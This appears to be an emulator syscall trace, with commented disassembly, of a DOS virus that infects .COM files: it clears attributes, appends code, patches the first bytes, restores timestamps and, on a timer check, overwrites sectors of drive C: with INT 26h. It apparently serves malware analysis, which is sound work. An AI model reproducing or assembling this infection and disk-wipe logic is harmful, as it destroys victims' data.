2018-12-25T12:22:43.100391714Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.132263519Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.138660234Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.140483024Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.147594385Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.149245208Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.152180139Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.182493165Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.183784254Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.19099817Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.192431832Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.248398983Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.251823812Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.349086249Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.35721098Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.359234392Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.36623172Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.367686921Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.369942507Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.380186677Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.381828297Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.384787492Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.386986524Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.449005411Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.452764445Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.533734779Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.540641997Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.541948138Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.545073547Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.546313679Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.556250013Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.632572363Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.634048081Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.640428886Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.643010212Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.748820855Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.751554737Z 44 PC: 12aa1 | Get time 0x12aa1: cmp dl, 2
; Instruction window logged after the Get time call that follows the last Find next file: a time-gated disk write, then hand-back to offset 0100h.
0x12aa4: ja 0x12aaf                        ; skip the disk write unless the preceding `cmp dl, 2` found hundredths-of-a-second <= 2
0x12aa6: mov al, 2                         ; INT 26h drive number: 2 = C:
0x12aa8: mov cx, 0x4d2                     ; sector count = 0x4d2 (1234)
0x12aab: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code; DX (first sector) = 0 when AX is non-negative, presumably AH still holds 2Ch
0x12aac: int 0x26                          ; DOS absolute disk write from DS:BX, destructive. NOTE(review): the log appears to list only INT 21h services, so a missing entry does not show this was skipped
0x12aae: popf                              ; INT 26h returns with the caller's flags still on the stack; discard them
0x12aaf: mov dx, 0x80                      ; DS:0080h, the default DTA location in the PSP
0x12ab2: mov ah, 0x1a                      ; AH=1Ah: set disk transfer address
0x12ab4: int 0x21                          ; (trace: "Set disk transfer address" at PC 12ab6)
0x12ab6: mov di, 0x100                     ; 0100h = entry offset of a .COM program
0x12ab9: push di
0x12aba: ret                               ; push/ret acts as a near jump to 0100h, presumably resuming the host program
0x12abb: lea dx, word ptr [bp + 0x253]     ; separate path, entered from outside this window: DX = file name at bp+0x253
0x12abf: mov ax, 0x4301                    ; AH=43h, AL=01h: set file attributes
0x12ac2: xor cx, cx                        ; CX = 0: clears every attribute, read-only included
0x12ac4: int 0x21
0x12ac6: mov ax, 0x3d02                    ; AH=3Dh, AL=02h: open file for read/write
0x12ac9: int 0x21
0x12acb: jb 0x12b23                        ; CF set = open failed: branch to 0x12b23
2018-12-25T12:22:43.75577237Z 26 PC: 12ab6 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":9223,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:42.544255371Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:22:42.546726675Z 67 PC: 12ac6 | Get or set file attributes
2018-12-25T12:22:42.55597837Z 61 PC: 12acb | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T12:22:42.562902391Z 78 PC: 12a94 | Find first file
2018-12-25T12:22:42.569269135Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.584355455Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.591091168Z 87 PC: 12ad3 | Get or set file date and time
2018-12-25T12:22:42.592754848Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:42.602359404Z 66 PC: 12aef | Move file pointer
2018-12-25T12:22:42.60402955Z 44 PC: 12afa | Get time 0x12afa: add dl, dh
; Instruction window logged after INT 21h AH=2Ch (Get time): the tail of the per-file modification routine.
0x12afc: je 0x12af6                        ; loop back while the preceding `add dl, dh` (hundredths + seconds) gave zero
0x12afe: mov word ptr [bp + 0x10e], bx     ; store BX at [bp+0x10e]; the value's role is not visible in this window
0x12b02: call 0x22a50                      ; NOTE(review): a 16-bit near call wraps at 64 KiB, so the target is likely 0x12a50; the 309-byte write logged at PC 12a5e fits that
0x12b05: mov ax, 0x4200                    ; AH=42h, AL=00h: move file pointer, origin = start of file
0x12b08: sub cx, cx                        ; CX = 0 (high word of the offset)
0x12b0a: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code: AX=4200h is non-negative, so DX = 0
0x12b0b: int 0x21                          ; seek to offset CX:DX = 0
0x12b0d: mov ah, 0x40                      ; AH=40h: write to file or device
0x12b0f: mov cx, 4                         ; byte count = 4
0x12b12: lea dx, word ptr [bp + 0x22d]     ; DX = source buffer at bp+0x22d (contents not shown)
0x12b16: int 0x21                          ; overwrites the first 4 bytes of the file (trace: "Write 4 bytes on handle 5")
0x12b18: pop dx                            ; pushed outside this window; used as the date (DX) ...
0x12b19: pop cx                            ; ... and time (CX) below; presumably the values returned by the function 57h call logged at PC 12ad3
0x12b1a: mov ax, 0x5701                    ; AH=57h, AL=01h: set file date and time
0x12b1d: int 0x21                          ; if these are the original values, the timestamp looks untouched; compare size or hash, not mtime
0x12b1f: mov ah, 0x3e                      ; AH=3Eh: close file handle
0x12b21: int 0x21
0x12b23: ret
0x12b24: pop bx                            ; past the ret; belongs to whatever code follows
2018-12-25T12:22:42.606518583Z 64 PC: 12a5e | Write file or device (Write 309 bytes on handle 5)
2018-12-25T12:22:42.630648548Z 66 PC: 12b0d | Move file pointer
2018-12-25T12:22:42.631996309Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:42.636847727Z 87 PC: 12b1f | Get or set file date and time
2018-12-25T12:22:42.639766813Z 62 PC: 12b23 | Close file
2018-12-25T12:22:42.676553956Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.678528909Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.693414298Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.697943483Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:42.699320722Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:42.706620647Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:42.70824398Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:42.70979239Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:42.712144567Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:42.713904543Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:42.717479181Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:42.719835034Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:42.765752653Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.768835831Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.795893617Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.803011543Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:42.805230809Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:42.811832336Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:42.814835743Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:42.8178848Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:42.828839053Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:42.830277024Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:42.833715997Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:42.835393319Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:42.891703873Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:42.895574188Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:42.93927825Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:42.947608498Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:42.949997062Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:42.956316153Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:42.957924156Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:42.960822441Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:42.963938876Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:42.965571009Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:42.969096664Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:42.971255294Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.01390046Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.017176392Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.053213392Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.060141523Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.061790408Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.069709354Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.07144241Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.073636042Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.078073858Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.079435789Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.081919188Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.084029217Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.11323263Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.115720618Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.147108131Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.151654178Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.152923581Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.159546836Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.160795095Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.163060384Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.202838025Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.204174215Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.213935294Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.216069517Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.289010016Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.291901651Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.3920614Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.400003191Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.40142495Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.40839578Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.410078915Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.412357785Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.415858229Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.418377446Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.421644677Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.423527406Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.493781554Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.496796073Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T12:22:43.547456913Z 61 PC: 12acb | Open file (See above)
2018-12-25T12:22:43.556644033Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T12:22:43.558482364Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T12:22:43.565492935Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T12:22:43.568415959Z 44 PC: 12afa | Get time (See above)
2018-12-25T12:22:43.570983385Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T12:22:43.69219084Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T12:22:43.694897086Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:22:43.702029883Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T12:22:43.703918989Z 62 PC: 12b23 | Close file (See above)
2018-12-25T12:22:43.755906318Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T12:22:43.758933797Z 44 PC: 12aa1 | Get time 0x12aa1: cmp dl, 2
; Instruction window logged after the Get time call that follows the last Find next file: a time-gated disk write, then hand-back to offset 0100h.
0x12aa4: ja 0x12aaf                        ; skip the disk write unless the preceding `cmp dl, 2` found hundredths-of-a-second <= 2
0x12aa6: mov al, 2                         ; INT 26h drive number: 2 = C:
0x12aa8: mov cx, 0x4d2                     ; sector count = 0x4d2 (1234)
0x12aab: cdq                               ; one-byte opcode, i.e. CWD in 16-bit code; DX (first sector) = 0 when AX is non-negative, presumably AH still holds 2Ch
0x12aac: int 0x26                          ; DOS absolute disk write from DS:BX, destructive. NOTE(review): the log appears to list only INT 21h services, so a missing entry does not show this was skipped
0x12aae: popf                              ; INT 26h returns with the caller's flags still on the stack; discard them
0x12aaf: mov dx, 0x80                      ; DS:0080h, the default DTA location in the PSP
0x12ab2: mov ah, 0x1a                      ; AH=1Ah: set disk transfer address
0x12ab4: int 0x21                          ; (trace: "Set disk transfer address" at PC 12ab6)
0x12ab6: mov di, 0x100                     ; 0100h = entry offset of a .COM program
0x12ab9: push di
0x12aba: ret                               ; push/ret acts as a near jump to 0100h, presumably resuming the host program
0x12abb: lea dx, word ptr [bp + 0x253]     ; separate path, entered from outside this window: DX = file name at bp+0x253
0x12abf: mov ax, 0x4301                    ; AH=43h, AL=01h: set file attributes
0x12ac2: xor cx, cx                        ; CX = 0: clears every attribute, read-only included
0x12ac4: int 0x21
0x12ac6: mov ax, 0x3d02                    ; AH=3Dh, AL=02h: open file for read/write
0x12ac9: int 0x21
0x12acb: jb 0x12b23                        ; CF set = open failed: branch to 0x12b23
2018-12-25T12:22:43.76141094Z 26 PC: 12ab6 | Set disk transfer address